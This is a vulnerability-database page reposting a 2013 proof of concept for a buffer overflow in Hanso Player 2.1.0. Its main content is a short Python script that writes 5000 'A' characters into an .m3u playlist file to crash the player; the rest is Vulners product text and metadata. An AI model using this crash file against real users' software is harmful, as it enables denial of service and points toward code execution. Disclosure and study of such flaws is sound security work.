Lucene search
K

Hanso Player 2.1.0 Buffer Overflow

🗓️ 01 Mar 2013 00:00:00Reported by metacomType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

Buffer Overflow Vulnerability Hanso Player version 2.1.0. Exploit for Hanso Player 2.1.0 Buffer Overflow issu

Code
`#!/usr/bin/python  
# Exploit Title:Buffer Overflow Vulnerability Hanso Player version 2.1.0  
# Download link :www.hansotools.com/downloads/hanso-player-setup.exe  
# Author: metacom  
# RST  
# version: 2.1.0  
# Category: poc  
# Tested on: windows 7 German   
  
f=open("fuzzzzz.m3u","w")  
print "Creating expoit."  
  
junk="\x41" * 5000  
  
try:   
f.write(junk)  
f.close()  
print "File created"  
except:  
print "File cannot be created"  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Mar 2013 00:00Current
1.2Low risk
Vulners AI Score1.2
27